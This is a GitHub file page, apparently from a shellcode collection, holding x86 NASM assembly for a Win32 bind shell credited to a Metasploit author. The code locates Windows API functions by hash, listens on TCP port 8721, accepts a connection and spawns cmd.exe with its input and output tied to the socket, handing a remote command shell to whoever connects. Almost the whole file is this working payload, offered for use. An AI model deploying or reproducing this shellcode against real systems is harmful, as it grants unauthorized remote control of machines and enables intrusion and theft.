-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathshellcode-173.c
executable file
·244 lines (195 loc) · 4.68 KB
/
shellcode-173.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
; Title: Win32 Bind Shell
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Function: Listen for connection and spawn command shell
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm
[BITS 32]
global _start
_start:
LCaller:
call LLoadFunctions
LDataSegment:
;========================
dd "CMD"
dd 0x79c679e7 ; closesocket 12
dd 0x498649e5 ; accept 16
dd 0xe92eada4 ; listen 20
dd 0xc7701aa4 ; bind 24
dd 0xadf509d9 ; WSASocketA 28
dd 0x3bfcedcb ; WSAStartup 32
dd 0xec0e4e8e ; LoadLibraryA 36
dd 0x73e2d87e ; ExitProcess 40
dd 0xce05d9ad ; WaitForSingleObject 44
dd 0x16b3fe72 ; CreateProcessA 48
db "WS2_32.DLL", 0x00, 0x01
;========================
LLoadFunctions:
pop ebx
push esp
mov ebp, esp
mov [ebp], ebx
LKernel32Base:
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebx, [eax + 0x08]
jmp short LStartLoading
LLoadWinsock:
lea edx, [edi + 44] ; get address of ws2_32.dll
push ecx ; save counter
push edx ; push address of ws2_32.dll
call eax ; LoadLibraryA()
mov ebx, eax ; save module handle
pop ecx ; restore counter
jmp short Looper2
LStartLoading:
; Start loading addresses at ebp + 12
push byte 0x08
pop esi
add esi, ebp
; Function counter
push byte 0x0a
pop ecx
mov edi, [ebp]
Looper:
cmp cl, 0x06
je short LLoadWinsock
Looper2:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx*4] ; function hash value
call LGetProcAddress ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
xor edi, edi
LWSAStartup:
; WSAStartup(0x101, DATA)
sub sp, 400
push esp
push 0x101
call [ebp + 32]
LWSASocketA:
; WSASocketA(2,1,0,0,0,0)
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call [ebp + 28]
mov ebx, eax ; save socket to ebx
xor edi, edi
LBind:
push edi
push edi
push dword 0x11220002 ; port 8721
mov esi, esp
push byte 0x10 ; length
push esi
push ebx
call [ebp + 24]
LListen:
push edi
push ebx
call [ebp + 20]
LAccept:
push edi
push esi
push ebx
call [ebp + 16]
mov edx, eax
LCreateProcessStructs:
; allocate space for STARTUPINFO, PROCESS_INFORMATION
sub sp, 0x54
; zero out SI/PI
lea edi, [esp]
xor eax, eax
push byte 21
pop ecx
LBZero:
rep stosd
mov edi, edx
mov byte [esp + 16], 68 ; si.cb = sizeof(si)
inc byte [esp + 61] ; si.dwFlags = 0x100
; socket handles
mov [esp + 16 + 56], edi
mov [esp + 16 + 60], edi
mov [esp + 16 + 64], edi
lea eax, [esp + 16] ; si
push esp ; pi
push eax
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push dword [ebp]
push ecx
LCreateProcess:
call [ebp + 48]
mov ecx, esp
LWaitForSingleObject:
push 0xFFFFFFFF
push dword [ecx]
call [ebp + 44]
LCloseSocket:
push edi
call [ebp + 12]
LFinished:
call [ebp + 40]
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 8